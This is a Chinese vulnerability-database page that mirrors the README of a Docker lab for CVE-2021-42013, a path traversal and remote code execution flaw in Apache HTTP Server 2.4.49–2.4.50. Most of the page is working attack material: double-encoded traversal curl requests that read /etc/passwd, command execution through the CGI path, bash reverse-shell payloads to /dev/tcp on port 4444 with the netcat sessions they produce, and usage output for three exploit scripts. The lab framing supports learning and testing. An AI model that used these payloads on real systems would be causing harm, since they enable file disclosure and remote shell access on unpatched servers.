漏洞平台

POC详情： 9362cdefe926e167bf69989ad3fe8666301614aa

来源

https://github.com/twseptian/cve-2021-42013-docker-lab

关联漏洞

标题： Apache HTTP Server 安全漏洞 (CVE-2021-42013)
描述：Apache HTTP Server是美国阿帕奇（Apache）基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 Apache HTTP Server 存在安全漏洞，该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别

描述

Docker container lab to play/learn with CVE-2021-42013

介绍

# CVE-2021-42013
## Introduction
It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions [[1]](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013).

## Docker container lab to play/learn with CVE-2021-42013

1. File disclosure vulnerability configuration:
```bash
$ docker build -t apache-default default_conf
$ docker run -dit --name apache-app -p 81:80 apache-default
```

- Proof of Concept:
```bash
$ curl -s --path-as-is "http://172.17.0.2:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
```
- using `path_traversal_vuln.py`
```bash
$ python3 path_traversal_vuln.py -h                                                                         

    >> CVE-2021-42013 - Path Traversal
    >> by twseptian

usage: path_traversal_vuln.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -f FILE_READ

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
  -f FILE_READ, --file FILE_READ
                        File to read
```
```bash
$ python3 path_traversal_vuln.py -t 172.17.0.2 -p 80 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65' -f /etc/passwd                                                                                  
```
![Path traversal](path_traversal.png)


2. Remote Code Execution  (CGI enabled) configuration:
```
$ docker build -t apache-cgi cgi_mod_enable
$ docker run -dit --name apache-lab -p 82:80 apache-cgi
```

- Proof of Concept:
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh"
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```

- PoC using bash reverse shell
```bash
$ curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/172.17.0.1/4444 0>&1" "http://172.17.0.3:80/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/bash"
```

- netcat output
```bash
$ nc -lvnp 4444                                                            
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.3.
Ncat: Connection from 172.17.0.3:35660.
daemon@dcbbed945af7:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@dcbbed945af7:/bin$ 
```
-using `rce.py`
```bash
$ python3 rce.py -h

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

usage: rce.py [-h] -t URL -p TARGET_PORT -x PAYLOAD -s SHELL

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
  -s SHELL, --shell SHELL
                        shell
```
```bash
$ python3 rce.py -t 172.17.0.3 -p 80 -x '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65' -s "/bin/bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
```
- netcat listener
```bash
$ nc -lvnp 4444                                                    
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41052
daemon@82f07f4b32a8:/bin$ 
```
![using rce.py](rce.png)

- using `rce2.py`
```bash
$ python3 rce2.py -h

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

usage: rce2.py [-h] -t URL -p TARGET_PORT -L LOCALHOST -P LOCALPORT -x PAYLOAD

CVE-2021-42013 - Path Traversal

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  Target IP
  -p TARGET_PORT, --port TARGET_PORT
                        Target port
  -L LOCALHOST, --lh LOCALHOST
                        Localhost/Local IP
  -P LOCALPORT, --lp LOCALPORT
                        Localport
  -x PAYLOAD, --execute PAYLOAD
                        Path Traversal Payload
```
```bash
$ python3 rce2.py -t 172.17.0.3 -p 80 -L 172.17.0.1 -P 4444 -x '.%%32%65/.%%32%65/.%%32%65/.%%32%65'

    >> CVE-2021-42013 - Remote Code Execution
    >> by twseptian

[!] Payload: .%%32%65/.%%32%65/.%%32%65/.%%32%65
[*] Setting up a netcat listener
listening on [any] 4444 ...
connect to [172.17.0.1] from (UNKNOWN) [172.17.0.3] 41122
bash: initialize_job_control: no job control in background: Bad file descriptor
daemon@82f07f4b32a8:/bin$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@82f07f4b32a8:/bin$
```

![using rce.py](rce2.png)

References
- [[1] CVE-2021-42013](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013)
- [[2] Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)](https://www.exploit-db.com/exploits/50406)

文件快照


 [4.0K]  /data/pocs/9362cdefe926e167bf69989ad3fe8666301614aa
├── [4.0K]  cgi_mod_enable
│   ├── [  71]  Dockerfile
│   └── [ 20K]  httpd.conf
├── [4.0K]  default_conf
│   ├── [  71]  Dockerfile
│   └── [ 20K]  httpd.conf
├── [ 99K]  path_traversal.png
├── [2.8K]  path_traversal_vuln.py
├── [3.1K]  rce1.py
├── [ 33K]  rce2.png
├── [3.7K]  rce2.py
├── [ 40K]  rce.png
└── [6.3K]  README.md

2 directories, 11 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。